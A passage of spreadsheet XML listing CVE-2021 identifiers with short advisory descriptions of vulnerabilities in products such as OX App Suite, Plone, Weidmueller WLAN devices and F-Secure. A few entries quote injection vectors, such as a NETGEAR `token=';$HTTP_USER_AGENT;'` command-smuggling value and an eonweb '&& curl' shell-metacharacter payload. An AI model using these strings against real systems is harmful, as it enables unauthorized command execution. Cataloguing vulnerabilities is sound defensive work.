    <t>A stack-based buffer overflow vulnerability was discovered in gocr through 0.53-20200802 in try_to_divide_boxes() in pgm2asc.c.</t>
  </si>
  <si>
    <t>CVE-2021-33483</t>
  </si>
  <si>
    <t>An issue was discovered in CommentsService.ashx in OnyakTech Comments Pro 3.8. The comment posting functionality allows an attacker to add an XSS payload to the JSON request that will execute when users visit the page with the comment.</t>
  </si>
  <si>
    <t>CVE-2021-33484</t>
  </si>
  <si>
    <t>An issue was discovered in CommentsService.ashx in OnyakTech Comments Pro 3.8. An attacker can download a copy of the installer, decompile it, and discover a hardcoded IV used to encrypt the username and userid in the comment POST request. Additionally, the attacker can decrypt the encrypted encryption key (sent as a parameter in the comment form request) by setting this encrypted value as the username, which will appear on the comment page in its decrypted form. Using these two values (combined with the encryption functionality discovered in the decompiled installer), the attacker can encrypt another user's ID and username. These values can be used as part of the comment posting request in order to spoof the user.</t>
  </si>
  <si>
    <t>CVE-2021-33485</t>
  </si>
  <si>
    <t>CODESYS Control Runtime system before 3.5.17.10 has a Heap-based Buffer Overflow.</t>
  </si>
  <si>
    <t>CVE-2021-33486</t>
  </si>
  <si>
    <t>All versions of the CODESYS V3 Runtime Toolkit for VxWorks from version V3.5.8.0 and before version V3.5.17.10 have Improper Handling of Exceptional Conditions.</t>
  </si>
  <si>
    <t>CVE-2021-33488</t>
  </si>
  <si>
    <t>chat in OX App Suite 7.10.5 has Improper Input Validation. A user can be redirected to a rogue OX Chat server via a development-related hook.</t>
  </si>
  <si>
    <t>CVE-2021-33489</t>
  </si>
  <si>
    <t>OX App Suite through 7.10.5 allows XSS via JavaScript code in a shared XCF file.</t>
  </si>
  <si>
    <t>CVE-2021-3349</t>
  </si>
  <si>
    <t>** DISPUTED ** GNOME Evolution through 3.38.3 produces a "Valid signature" message for an unknown identifier on a previously trusted key because Evolution does not retrieve enough information from the GnuPG API. NOTE: third parties dispute the significance of this issue, and dispute whether Evolution is the best place to change this behavior.</t>
  </si>
  <si>
    <t>CVE-2021-33490</t>
  </si>
  <si>
    <t>OX App Suite through 7.10.5 allows XSS via a crafted snippet in a shared mail signature.</t>
  </si>
  <si>
    <t>CVE-2021-33491</t>
  </si>
  <si>
    <t>OX App Suite through 7.10.5 allows Directory Traversal via ../ in an OOXML or ODF ZIP archive, because of the mishandling of relative paths in mail addresses in conjunction with auto-configuration DNS records.</t>
  </si>
  <si>
    <t>CVE-2021-33492</t>
  </si>
  <si>
    <t>OX App Suite 7.10.5 allows XSS via an OX Chat room name.</t>
  </si>
  <si>
    <t>CVE-2021-33493</t>
  </si>
  <si>
    <t>The middleware component in OX App Suite through 7.10.5 allows Code Injection via Java classes in a YAML format.</t>
  </si>
  <si>
    <t>CVE-2021-33494</t>
  </si>
  <si>
    <t>OX App Suite 7.10.5 allows XSS via an OX Chat room title during typing rendering.</t>
  </si>
  <si>
    <t>CVE-2021-33495</t>
  </si>
  <si>
    <t>OX App Suite 7.10.5 allows XSS via an OX Chat system message.</t>
  </si>
  <si>
    <t>CVE-2021-33496</t>
  </si>
  <si>
    <t>Dutchcoders transfer.sh before 1.2.4 allows XSS via an inline view.</t>
  </si>
  <si>
    <t>CVE-2021-33497</t>
  </si>
  <si>
    <t>Dutchcoders transfer.sh before 1.2.4 allows Directory Traversal for deleting files.</t>
  </si>
  <si>
    <t>CVE-2021-33498</t>
  </si>
  <si>
    <t>Pexip Infinity before 26 allows remote denial of service because of missing H.264 input validation (issue 1 of 2).</t>
  </si>
  <si>
    <t>CVE-2021-33499</t>
  </si>
  <si>
    <t>Pexip Infinity before 26 allows remote denial of service because of missing H.264 input validation (issue 2 of 2).</t>
  </si>
  <si>
    <t>CVE-2021-3350</t>
  </si>
  <si>
    <t>deleteaccount.php in the Delete Account plugin 1.4 for MyBB allows XSS via the deletereason parameter.</t>
  </si>
  <si>
    <t>CVE-2021-33500</t>
  </si>
  <si>
    <t>PuTTY before 0.75 on Windows allows remote servers to cause a denial of service (Windows GUI hang) by telling the PuTTY window to change its title repeatedly at high speed, which results in many SetWindowTextA or SetWindowTextW calls. NOTE: the same attack methodology may affect some OS-level GUIs on Linux or other platforms for similar reasons.</t>
  </si>
  <si>
    <t>CVE-2021-33501</t>
  </si>
  <si>
    <t>Overwolf Client 0.169.0.22 allows XSS, with resultant Remote Code Execution, via an overwolfstore:// URL.</t>
  </si>
  <si>
    <t>CVE-2021-33502</t>
  </si>
  <si>
    <t>The normalize-url package before 4.5.1, 5.x before 5.3.1, and 6.x before 6.0.1 for Node.js has a ReDoS (regular expression denial of service) issue because it has exponential performance for data: URLs.</t>
  </si>
  <si>
    <t>CVE-2021-33503</t>
  </si>
  <si>
    <t>An issue was discovered in urllib3 before 1.26.5. When provided with a URL containing many @ characters in the authority component, the authority regular expression exhibits catastrophic backtracking, causing a denial of service if a URL were passed as a parameter or redirected to via an HTTP redirect.</t>
  </si>
  <si>
    <t>CVE-2021-33504</t>
  </si>
  <si>
    <t>Couchbase Server before 7.1.0 has Incorrect Access Control.</t>
  </si>
  <si>
    <t>CVE-2021-33505</t>
  </si>
  <si>
    <t>A local malicious user can circumvent the Falco detection engine through 0.28.1 by running a program that alters arguments of system calls being executed. Issue is fixed in Falco versions &gt;= 0.29.1.</t>
  </si>
  <si>
    <t>CVE-2021-33506</t>
  </si>
  <si>
    <t>jitsi-meet-prosody in Jitsi Meet before 2.0.5963-1 does not ensure that restrict_room_creation is set by default. This can allow an attacker to circumvent conference moderation.</t>
  </si>
  <si>
    <t>CVE-2021-33507</t>
  </si>
  <si>
    <t>Zope Products.CMFCore before 2.5.1 and Products.PluggableAuthService before 2.6.2, as used in Plone through 5.2.4 and other products, allow Reflected XSS.</t>
  </si>
  <si>
    <t>CVE-2021-33508</t>
  </si>
  <si>
    <t>Plone through 5.2.4 allows XSS via a full name that is mishandled during rendering of the ownership tab of a content item.</t>
  </si>
  <si>
    <t>CVE-2021-33509</t>
  </si>
  <si>
    <t>Plone through 5.2.4 allows remote authenticated managers to perform disk I/O via crafted keyword arguments to the ReStructuredText transform in a Python script.</t>
  </si>
  <si>
    <t>CVE-2021-3351</t>
  </si>
  <si>
    <t>OpenPLC runtime V3 through 2016-03-14 allows stored XSS via the Device Name to the web server's Add New Device page.</t>
  </si>
  <si>
    <t>CVE-2021-33510</t>
  </si>
  <si>
    <t>Plone through 5.2.4 allows remote authenticated managers to conduct SSRF attacks via an event ical URL, to read one line of a file.</t>
  </si>
  <si>
    <t>CVE-2021-33511</t>
  </si>
  <si>
    <t>Plone though 5.2.4 allows SSRF via the lxml parser. This affects Diazo themes, Dexterity TTW schemas, and modeleditors in plone.app.theming, plone.app.dexterity, and plone.supermodel.</t>
  </si>
  <si>
    <t>CVE-2021-33512</t>
  </si>
  <si>
    <t>Plone through 5.2.4 allows stored XSS attacks (by a Contributor) by uploading an SVG or HTML document.</t>
  </si>
  <si>
    <t>CVE-2021-33513</t>
  </si>
  <si>
    <t>Plone through 5.2.4 allows XSS via the inline_diff methods in Products.CMFDiffTool.</t>
  </si>
  <si>
    <t>CVE-2021-33514</t>
  </si>
  <si>
    <t>Certain NETGEAR devices are affected by command injection by an unauthenticated attacker via the vulnerable /sqfs/lib/libsal.so.0.0 library used by a CGI application, as demonstrated by setup.cgi?token=';$HTTP_USER_AGENT;' with an OS command in the User-Agent field. This affects GC108P before 1.0.7.3, GC108PP before 1.0.7.3, GS108Tv3 before 7.0.6.3, GS110TPPv1 before 7.0.6.3, GS110TPv3 before 7.0.6.3, GS110TUPv1 before 1.0.4.3, GS710TUPv1 before 1.0.4.3, GS716TP before 1.0.2.3, GS716TPP before 1.0.2.3, GS724TPPv1 before 2.0.4.3, GS724TPv2 before 2.0.4.3, GS728TPPv2 before 6.0.6.3, GS728TPv2 before 6.0.6.3, GS752TPPv1 before 6.0.6.3, GS752TPv2 before 6.0.6.3, MS510TXM before 1.0.2.3, and MS510TXUP before 1.0.2.3.</t>
  </si>
  <si>
    <t>CVE-2021-33515</t>
  </si>
  <si>
    <t>The submission service in Dovecot before 2.3.15 allows STARTTLS command injection in lib-smtp. Sensitive information can be redirected to an attacker-controlled address.</t>
  </si>
  <si>
    <t>CVE-2021-33516</t>
  </si>
  <si>
    <t>An issue was discovered in GUPnP before 1.0.7 and 1.1.x and 1.2.x before 1.2.5. It allows DNS rebinding. A remote web server can exploit this vulnerability to trick a victim's browser into triggering actions against local UPnP services implemented using this library. Depending on the affected service, this could be used for data exfiltration, data tempering, etc.</t>
  </si>
  <si>
    <t>CVE-2021-3352</t>
  </si>
  <si>
    <t>The Software Development Kit in Mitel MiContact Center Business from 8.0.0.0 through 8.1.4.1 and 9.0.0.0 through 9.3.1.0 could allow an unauthenticated attacker to access (view and modify) user data without authorization due to improper handling of tokens.</t>
  </si>
  <si>
    <t>CVE-2021-33523</t>
  </si>
  <si>
    <t>MashZone NextGen through 10.7 GA allows a remote authenticated user, with access to the admin console, to upload a new JDBC driver that can execute arbitrary commands on the underlying host. This occurs in com.idsscheer.ppmmashup.business.jdbc.DriverUploadController.</t>
  </si>
  <si>
    <t>CVE-2021-33525</t>
  </si>
  <si>
    <t>EyesOfNetwork eonweb through 5.3-11 allows Remote Command Execution (by authenticated users) via shell metacharacters in the nagios_path parameter to lilac/export.php, as demonstrated by %26%26+curl to insert an "&amp;&amp; curl" substring for the shell.</t>
  </si>
  <si>
    <t>CVE-2021-33526</t>
  </si>
  <si>
    <t>In MB connect line mbDIALUP versions &lt;= 3.9R0.0 a low privileged local attacker can send a command to the service running with NT AUTHORITY\SYSTEM instructing it to execute a malicous OpenVPN configuration resulting in arbitrary code execution with the privileges of the service.</t>
  </si>
  <si>
    <t>CVE-2021-33527</t>
  </si>
  <si>
    <t>In MB connect line mbDIALUP versions &lt;= 3.9R0.0 a remote attacker can send a specifically crafted HTTP request to the service running with NT AUTHORITY\SYSTEM that will not correctly validate the input. This can lead to an arbitrary code execution with the privileges of the service.</t>
  </si>
  <si>
    <t>CVE-2021-33528</t>
  </si>
  <si>
    <t>In Weidmueller Industrial WLAN devices in multiple versions an exploitable privilege escalation vulnerability exists in the iw_console functionality. A specially crafted menu selection string can cause an escape from the restricted console, resulting in system access as the root user. An attacker can send commands while authenticated as a low privilege user to trigger this vulnerability.</t>
  </si>
  <si>
    <t>710</t>
  </si>
  <si>
    <t>CVE-2021-33529</t>
  </si>
  <si>
    <t>In Weidmueller Industrial WLAN devices in multiple versions the usage of hard-coded cryptographic keys within the service agent binary allows for the decryption of captured traffic across the network from or to the device.</t>
  </si>
  <si>
    <t>CVE-2021-33530</t>
  </si>
  <si>
    <t>In Weidmueller Industrial WLAN devices in multiple versions an exploitable command injection vulnerability exists in encrypted diagnostic script functionality of the devices. A specially crafted diagnostic script file can cause arbitrary busybox commands to be executed, resulting in remote control over the device. An attacker can send diagnostic while authenticated as a low privilege user to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-33531</t>
  </si>
  <si>
    <t>In Weidmueller Industrial WLAN devices in multiple versions an exploitable use of hard-coded credentials vulnerability exists in multiple iw_* utilities. The device operating system contains an undocumented encryption password, allowing for the creation of custom diagnostic scripts. An attacker can send diagnostic scripts while authenticated as a low privilege user to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-33532</t>
  </si>
  <si>
    <t>In Weidmueller Industrial WLAN devices in multiple versions an exploitable command injection vulnerability exists in the iw_webs functionality. A specially crafted diagnostic script file name can cause user input to be reflected in a subsequent iw_system call, resulting in remote control over the device. An attacker can send commands while authenticated as a low privilege user to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-33533</t>
  </si>
  <si>
    <t>In Weidmueller Industrial WLAN devices in multiple versions an exploitable command injection vulnerability exists in the iw_webs functionality. A specially crafted iw_serverip parameter can cause user input to be reflected in a subsequent iw_system call, resulting in remote control over the device. An attacker can send commands while authenticated as a low privilege user to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-33534</t>
  </si>
  <si>
    <t>In Weidmueller Industrial WLAN devices in multiple versions an exploitable command injection vulnerability exists in the hostname functionality. A specially crafted entry to network configuration information can cause execution of arbitrary system commands, resulting in full control of the device. An attacker can send various requests while authenticated as a high privilege user to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-33535</t>
  </si>
  <si>
    <t>In Weidmueller Industrial WLAN devices in multiple versions an exploitable format string vulnerability exists in the iw_console conio_writestr functionality. A specially crafted time server entry can cause an overflow of the time server buffer, resulting in remote code execution. An attacker can send commands while authenticated as a low privilege user to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-33536</t>
  </si>
  <si>
    <t>In Weidmueller Industrial WLAN devices in multiple versions an exploitable denial-of-service vulnerability exists in ServiceAgent functionality. A specially crafted packet can cause an integer underflow, triggering a large memcpy that will access unmapped or out-of-bounds memory. An attacker can send this packet while unauthenticated to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-33537</t>
  </si>
  <si>
    <t>In Weidmueller Industrial WLAN devices in multiple versions an exploitable remote code execution vulnerability exists in the iw_webs configuration parsing functionality. A specially crafted user name entry can cause an overflow of an error message buffer, resulting in remote code execution. An attacker can send commands while authenticated as a low privilege user to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-33538</t>
  </si>
  <si>
    <t>In Weidmueller Industrial WLAN devices in multiple versions an exploitable improper access control vulnerability exists in the iw_webs account settings functionality. A specially crafted user name entry can cause the overwrite of an existing user account password, resulting in remote shell access to the device as that user. An attacker can send commands while authenticated as a low privilege user to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-33539</t>
  </si>
  <si>
    <t>In Weidmueller Industrial WLAN devices in multiple versions an exploitable authentication bypass vulnerability exists in the hostname processing. A specially configured device hostname can cause the device to interpret selected remote traffic as local traffic, resulting in a bypass of web authentication. An attacker can send authenticated SNMP requests to trigger this vulnerability.</t>
  </si>
  <si>
    <t>CVE-2021-33540</t>
  </si>
  <si>
    <t>In certain devices of the Phoenix Contact AXL F BK and IL BK product families an undocumented password protected FTP access to the root directory exists.</t>
  </si>
  <si>
    <t>CVE-2021-33541</t>
  </si>
  <si>
    <t>Phoenix Contact Classic Line Controllers ILC1x0 and ILC1x1 in all versions/variants are affected by a Denial-of-Service vulnerability. The communication protocols and device access do not feature authentication measures. Remote attackers can use specially crafted IP packets to cause a denial of service on the PLC's network communication module. A successful attack stops all network communication. To restore the network connectivity the device needs to be restarted. The automation task is not affected.</t>
  </si>
  <si>
    <t>CVE-2021-33542</t>
  </si>
  <si>
    <t>Phoenix Contact Classic Automation Worx Software Suite in Version 1.87 and below is affected by a remote code execution vulnerability. Manipulated PC Worx or Config+ projects could lead to a remote code execution when unallocated memory is freed because of incompletely initialized data. The attacker needs to get access to an original bus configuration file (*.bcp) to be able to manipulate data inside. After manipulation the attacker needs to exchange the original file by the manipulated one on the application programming workstation. Availability, integrity, or confidentiality of an application programming workstation might be compromised by attacks using these vulnerabilities. Automated systems in operation which were programmed with one of the above-mentioned products are not affected.</t>
  </si>
  <si>
    <t>CVE-2021-33543</t>
  </si>
  <si>
    <t>Multiple camera devices by UDP Technology, GeutebrÃ¼ck and other vendors allow unauthenticated remote access to sensitive files due to default user authentication settings. This can lead to manipulation of the device and denial of service.</t>
  </si>
  <si>
    <t>CVE-2021-33544</t>
  </si>
  <si>
    <t>Multiple camera devices by UDP Technology, GeutebrÃ¼ck and other vendors are vulnerable to command injection, which may allow an attacker to remotely execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-33545</t>
  </si>
  <si>
    <t>Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to a stack-based buffer overflow condition in the counter parameter which may allow an attacker to remotely execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-33546</t>
  </si>
  <si>
    <t>Multiple camera devices by UDP Technology, GeutebrÃ¼ck and other vendors are vulnerable to a stack-based buffer overflow condition in the name parameter, which may allow an attacker to remotely execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-33547</t>
  </si>
  <si>
    <t>Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to a stack-based buffer overflow condition in the profile parameter which may allow an attacker to remotely execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-33548</t>
  </si>
  <si>
    <t>CVE-2021-33549</t>
  </si>
  <si>
    <t>Multiple camera devices by UDP Technology, Geutebrück and other vendors are vulnerable to a stack-based buffer overflow condition in the action parameter, which may allow an attacker to remotely execute arbitrary code.</t>
  </si>
  <si>
    <t>CVE-2021-3355</t>
  </si>
  <si>
    <t>A stored-self XSS exists in LightCMS v1.3.4, allowing an attacker to execute HTML or JavaScript code in a vulnerable Title field to /admin/SensitiveWords.</t>
  </si>
  <si>
    <t>exploits/multiple/webapps/49598.txt</t>
  </si>
  <si>
    <t>LightCMS 1.3.4 - 'exclusive' Stored XSS</t>
  </si>
  <si>
    <t>2021-02-26</t>
  </si>
  <si>
    <t>CVE-2021-33550</t>
  </si>
  <si>
    <t>CVE-2021-33551</t>
  </si>
  <si>
    <t>CVE-2021-33552</t>
  </si>
  <si>
    <t>CVE-2021-33553</t>
  </si>
  <si>
    <t>CVE-2021-33554</t>
  </si>
  <si>
    <t>CVE-2021-33555</t>
  </si>
  <si>
    <t>In PEPPERL+FUCHS WirelessHART-Gateway &lt;= 3.0.7 the filename parameter is vulnerable to unauthenticated path traversal attacks, enabling read access to arbitrary files on the server.</t>
  </si>
  <si>
    <t>CVE-2021-33557</t>
  </si>
  <si>
    <t>An XSS issue was discovered in manage_custom_field_edit_page.php in MantisBT before 2.25.2. Unescaped output of the return parameter allows an attacker to inject code into a hidden input field.</t>
  </si>
  <si>
    <t>CVE-2021-33558</t>
  </si>
  <si>
    <t>Boa 0.94.13 allows remote attackers to obtain sensitive information via a misconfiguration involving backup.html, preview.html, js/log.js, log.html, email.html, online-users.html, and config.js.</t>
  </si>
  <si>
    <t>CVE-2021-33560</t>
  </si>
  <si>
    <t>Libgcrypt before 1.8.8 and 1.9.x before 1.9.3 mishandles ElGamal encryption because it lacks exponent blinding to address a side-channel attack against mpi_powm, and the window size is not chosen appropriately. This, for example, affects use of ElGamal in OpenPGP.</t>
  </si>
  <si>
    <t>CVE-2021-33561</t>
  </si>
  <si>
    <t>A stored cross-site scripting (XSS) vulnerability in Shopizer before 2.17.0 allows remote attackers to inject arbitrary web script or HTML via customer_name in various forms of store administration. It is saved in the database. The code is executed for any user of store administration when information is fetched from the backend, e.g., in admin/customers/list.html.</t>
  </si>
  <si>
    <t>CVE-2021-33562</t>
  </si>
  <si>
    <t>A reflected cross-site scripting (XSS) vulnerability in Shopizer before 2.17.0 allows remote attackers to inject arbitrary web script or HTML via the ref parameter to a page about an arbitrary product, e.g., a product/insert-product-name-here.html/ref= URL.</t>
  </si>
  <si>
    <t>CVE-2021-33563</t>
  </si>
  <si>
    <t>Koel before 5.1.4 lacks login throttling, lacks a password strength policy, and shows whether a failed login attempt had a valid username. This might make brute-force attacks easier.</t>
  </si>
  <si>
    <t>CVE-2021-33564</t>
  </si>
  <si>
    <t>An argument injection vulnerability in the Dragonfly gem before 1.4.0 for Ruby allows remote attackers to read and write to arbitrary files via a crafted URL when the verify_url option is disabled. This may lead to code execution. The problem occurs because the generate and process features mishandle use of the ImageMagick convert utility.</t>
  </si>
  <si>
    <t>CVE-2021-33570</t>
  </si>
  <si>
    <t>Postbird 0.8.4 allows stored XSS via the onerror attribute of an IMG element in any PostgreSQL database table. This can result in reading local files via vectors involving XMLHttpRequest and open of a file:/// URL, or discovering PostgreSQL passwords via vectors involving Window.localStorage and savedConnections.</t>
  </si>
  <si>
    <t>CVE-2021-33571</t>
  </si>
  <si>
    <t>In Django 2.2 before 2.2.24, 3.x before 3.1.12, and 3.2 before 3.2.4, URLValidator, validate_ipv4_address, and validate_ipv46_address do not prohibit leading zero characters in octal literals. This may allow a bypass of access control that is based on IP addresses. (validate_ipv4_address and validate_ipv46_address are unaffected with Python 3.9.5+..) .</t>
  </si>
  <si>
    <t>CVE-2021-33572</t>
  </si>
  <si>
    <t>A Denial-of-Service (DoS) vulnerability was discovered in F-Secure Linux Security whereby the FSAVD component used in certain F-Secure products can crash while scanning larger packages/fuzzed files. The exploit can be triggered remotely by an attacker. A successful attack will result in Denial-of-Service (DoS) of the Anti-Virus engine.</t>
  </si>
  <si>
    <t>CVE-2021-33574</t>
  </si>
  <si>
    <t>The mq_notify function in the GNU C Library (aka glibc) versions 2.32 and 2.33 has a use-after-free. It may use the notification thread attributes object (passed through its struct sigevent parameter) after it has been freed by the caller, leading to a denial of service (application crash) or possibly unspecified other impact.</t>
  </si>
  <si>
    <t>CVE-2021-33575</t>
  </si>
  <si>
    <t>The Pixar ruby-jss gem before 1.6.0 allows remote attackers to execute arbitrary code because of the Plist gem's documented behavior of using Marshal.load during XML document processing.</t>
  </si>
  <si>
    <t>CVE-2021-33576</t>
  </si>
  <si>
    <t>An issue was discovered in Cleo LexiCom 5.5.0.0. Within the AS2 message, the sender can specify a filename. This filename can include path-traversal characters, allowing the file to be written to an arbitrary location on disk.</t>
  </si>
  <si>
    <t>CVE-2021-33577</t>
  </si>
  <si>
    <t>An issue was discovered in Cleo LexiCom 5.5.0.0. The requirement for the sender of an AS2 message to identify themselves (via encryption and signing of the message) can be bypassed by changing the Content-Type of the message to text/plain.</t>
  </si>
  <si>
    <t>CVE-2021-33578</t>
  </si>
  <si>
    <t>Echo ShareCare 8.15.5 is susceptible to SQL injection vulnerabilities when processing remote input from both authenticated and unauthenticated users, leading to the ability to bypass authentication, exfiltrate Structured Query Language (SQL) records, and manipulate data.</t>
  </si>
  <si>
    <t>CVE-2021-33580</t>
  </si>
  <si>
    <t>User controlled `request.getHeader("Referer")`, `request.getRequestURL()` and `request.getQueryString()` are used to build and run a regex expression. The attacker doesn't have to use a browser and may send a specially crafted Referer header programmatically. Since the attacker controls the string and the regex pattern he may cause a ReDoS by regex catastrophic backtracking on the server side. This problem has been fixed in Roller 6.0.2.</t>
  </si>
  <si>
    <t>CVE-2021-33581</t>
  </si>
  <si>
    <t>MashZone NextGen through 10.7 GA has an SSRF vulnerability that allows an attacker to interact with arbitrary TCP services, by abusing the feature to check the availability of a PPM connection. This occurs in com.idsscheer.ppmmashup.web.webservice.impl.ZPrestoAdminWebService.</t>
  </si>
  <si>
    <t>CVE-2021-33582</t>
  </si>
  <si>
    <t>Cyrus IMAP before 3.4.2 allows remote attackers to cause a denial of service (multiple-minute daemon hang) via input that is mishandled during hash-table interaction. Because there are many insertions into a single bucket, strcmp becomes slow. This is fixed in 3.4.2, 3.2.8, and 3.0.16.</t>
  </si>
  <si>
    <t>CVE-2021-33583</t>
  </si>
  <si>
    <t>REINER timeCard 6.05.07 installs a Microsoft SQL Server with an sa password that is hardcoded in the TCServer.jar file.</t>
  </si>
  <si>
    <t>CVE-2021-33586</t>
  </si>
  <si>
    <t>InspIRCd 3.8.0 through 3.9.x before 3.10.0 allows any user (able to connect to the server) to access recently deallocated memory, aka the "malformed PONG" issue.</t>
  </si>
  <si>
    <t>CVE-2021-33587</t>
  </si>
  <si>
    <t>The css-what package 4.0.0 through 5.0.0 for Node.js does not ensure that attribute parsing has Linear Time Complexity relative to the size of the input.</t>
  </si>
  <si>
    <t>CVE-2021-33590</t>
  </si>
  <si>
    <t>GattLib 0.3-rc1 has a stack-based buffer over-read in get_device_path_from_mac in dbus/gattlib.c.</t>
  </si>
  <si>
    <t>CVE-2021-33591</t>
  </si>
  <si>
    <t>An exposed remote debugging port in Naver Comic Viewer prior to 1.0.15.0 allowed a remote attacker to execute arbitrary code via a crafted HTML page.</t>
  </si>
  <si>
    <t>CVE-2021-33592</t>
  </si>
  <si>
    <t>NAVER Toolbar before 4.0.30.323 allows remote attackers to execute arbitrary code via a crafted upgrade.xml file. Special characters in filename parameter can be the cause of bypassing code signing check function.</t>
  </si>
  <si>
    <t>CVE-2021-33593</t>
  </si>
  <si>
    <t>Whale browser for iOS before 1.14.0 has an inconsistent user interface issue that allows an attacker to obfuscate the address bar which may lead to address bar spoofing.</t>
  </si>
  <si>
    <t>CVE-2021-33594</t>
  </si>
  <si>
    <t>An address bar spoofing vulnerability was discovered in Safe Browser for Android. When user clicks on a specially crafted a malicious URL, it appears like a legitimate one on the address bar, while the content comes from other domain and presented in a window, covering the original content. A remote attacker can leverage this to perform address bar spoofing attack.</t>
  </si>
  <si>
    <t>CVE-2021-33595</t>
  </si>
  <si>
    <t>A address bar spoofing vulnerability was discovered in Safe Browser for iOS. Showing the legitimate URL in the address bar while loading the content from other domain. This makes the user believe that the content is served by a legit domain. A remote attacker can leverage this to perform address bar spoofing attack.</t>
  </si>
  <si>
    <t>CVE-2021-33596</t>
  </si>
  <si>
    <t>Showing the legitimate URL in the address bar while loading the content from other domain. This makes the user believe that the content is served by a legit domain. Exploiting the vulnerability requires the user to click on a specially crafted, seemingly legitimate URL containing an embedded malicious redirect while using F-Secure Safe Browser for iOS.</t>
  </si>
  <si>
    <t>CVE-2021-33597</t>
  </si>
  <si>
    <t>A Denial-of-Service (DoS) vulnerability was discovered in F-Secure Atlant whereby the SAVAPI component used in certain F-Secure products can crash while scanning fuzzed files. The exploit can be triggered remotely by an attacker. A successful attack will result in Denial-of-Service (DoS) of the Anti-Virus engine.</t>
  </si>
  <si>
    <t>CVE-2021-33598</t>
  </si>
  <si>
    <t>A Denial-of-Service (DoS) vulnerability was discovered in all versions of F-Secure Atlant whereby the SAVAPI component used in certain F-Secure products can crash while scanning fuzzed files. The exploit can be triggered remotely by an attacker. A successful attack will result in Denial-of-Service (DoS) of the Anti-Virus engine.</t>
  </si>
  <si>
    <t>CVE-2021-33599</t>
  </si>
  <si>
    <t>A vulnerability affecting F-Secure Antivirus engine was discovered whereby scanning WIM archive file can lead to denial-of-service (infinite loop and freezes AV engine scanner). The vulnerability can be exploit remotely by an attacker. A successful attack will result in Denial-of-Service of the Anti-Virus engine.</t>
  </si>
  <si>
    <t>CVE-2021-33600</t>
  </si>
  <si>
    <t>A denial-of-service (DoS) vulnerability was discovered in the web user interface of F-Secure Internet Gatekeeper. The vulnerability occurs because of an attacker can trigger assertion via malformed HTTP packet to web interface. An unauthenticated attacker could exploit this vulnerability by sending a large username parameter. A successful exploitation could lead to a denial-of-service of the product.</t>
  </si>
  <si>
    <t>CVE-2021-33601</t>
  </si>
  <si>
    <t>A vulnerability was discovered in the web user interface of F-Secure Internet Gatekeeper. An authenticated user can modify settings through the web user interface in a way that could lead to an arbitrary code execution on the F-Secure Internet Gatekeeper server.</t>
  </si>
  <si>
    <t>CVE-2021-33602</t>
  </si>
  <si>
    <t>A vulnerability affecting the F-Secure Antivirus engine was discovered when the engine tries to unpack a zip archive (LZW decompression method), and this can crash the scanning engine. The vulnerability can be exploited remotely by an attacker. A successful attack will result in Denial-of-Service of the Anti-Virus engine.</t>
  </si>
  <si>
    <t>CVE-2021-33603</t>
  </si>
  <si>
    <t>A Denial-of-Service (DoS) vulnerability was discovered in F-Secure Atlant whereby the AVPACK module component used in certain F-Secure products can crash while scanning a fuzzed files. The exploit can be triggered remotely by an attacker. A successful attack will result in Denial-of-Service (DoS) of the Anti-Virus engine.</t>
  </si>
  <si>
    <t>CVE-2021-33604</t>
  </si>
  <si>
    <t>URL encoding error in development mode handler in com.vaadin:flow-server versions 2.0.0 through 2.6.1 (Vaadin 14.0.0 through 14.6.1), 3.0.0 through 6.0.9 (Vaadin 15.0.0 through 19.0.8) allows local user to execute arbitrary JavaScript code by opening crafted URL in browser.</t>
  </si>
  <si>
    <t>CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N</t>
  </si>
  <si>
    <t>CVE-2021-33605</t>
  </si>
  <si>
    <t>Improper check in CheckboxGroup in com.vaadin:vaadin-checkbox-flow versions 1.2.0 prior to 2.0.0 (Vaadin 12.0.0 prior to 14.0.0), 2.0.0 prior to 3.0.0 (Vaadin 14.0.0 prior to 14.5.0), 3.0.0 through 4.0.1 (Vaadin 15.0.0 through 17.0.11), 14.5.0 through 14.6.7 (Vaadin 14.5.0 through 14.6.7), and 18.0.0 through 20.0.5 (Vaadin 18.0.0 through 20.0.5) allows attackers to modify the value of a disabled Checkbox inside enabled CheckboxGroup component via unspecified vectors.</t>
  </si>
  <si>
    <t>CVE-2021-33609</t>
  </si>
  <si>
    <t>Missing check in DataCommunicator class in com.vaadin:vaadin-server versions 8.0.0 through 8.14.0 (Vaadin 8.0.0 through 8.14.0) allows authenticated network attacker to cause heap exhaustion by requesting too many rows of data.</t>
  </si>
  <si>
    <t>CVE-2021-33611</t>
  </si>
  <si>
    <t>Missing output sanitization in test sources in org.webjars.bowergithub.vaadin:vaadin-menu-bar versions 1.0.0 through 1.2.0 (Vaadin 14.0.0 through 14.4.4) allows remote attackers to execute malicious JavaScript in browser by opening crafted URL</t>
  </si>
  <si>
    <t>CVE-2021-33615</t>
  </si>
  <si>
    <t>RSA Archer 6.8.00500.1003 P5 allows Unrestricted Upload of a File with a Dangerous Type.</t>
  </si>
  <si>
    <t>CVE-2021-33616</t>
  </si>
  <si>
    <t>RSA Archer 6.x through 6.9 SP1 P4 (6.9.1.4) allows stored XSS.</t>
  </si>
  <si>
    <t>CVE-2021-33617</t>
  </si>
  <si>
    <t>Zoho ManageEngine Password Manager Pro before 11.2 11200 allows login/AjaxResponse.jsp?RequestType=GetUserDomainName&amp;userName= username enumeration, because the response (to a failed login request) is null only when the username is invalid.</t>
  </si>
  <si>
    <t>CVE-2021-33618</t>
  </si>
  <si>
    <t>Dolibarr ERP and CRM 13.0.2 allows XSS via object details, as demonstrated by &gt; and &lt; characters in the onpointermove attribute of a BODY element to the user-management feature.</t>
  </si>
  <si>
    <t>CVE-2021-33620</t>
  </si>
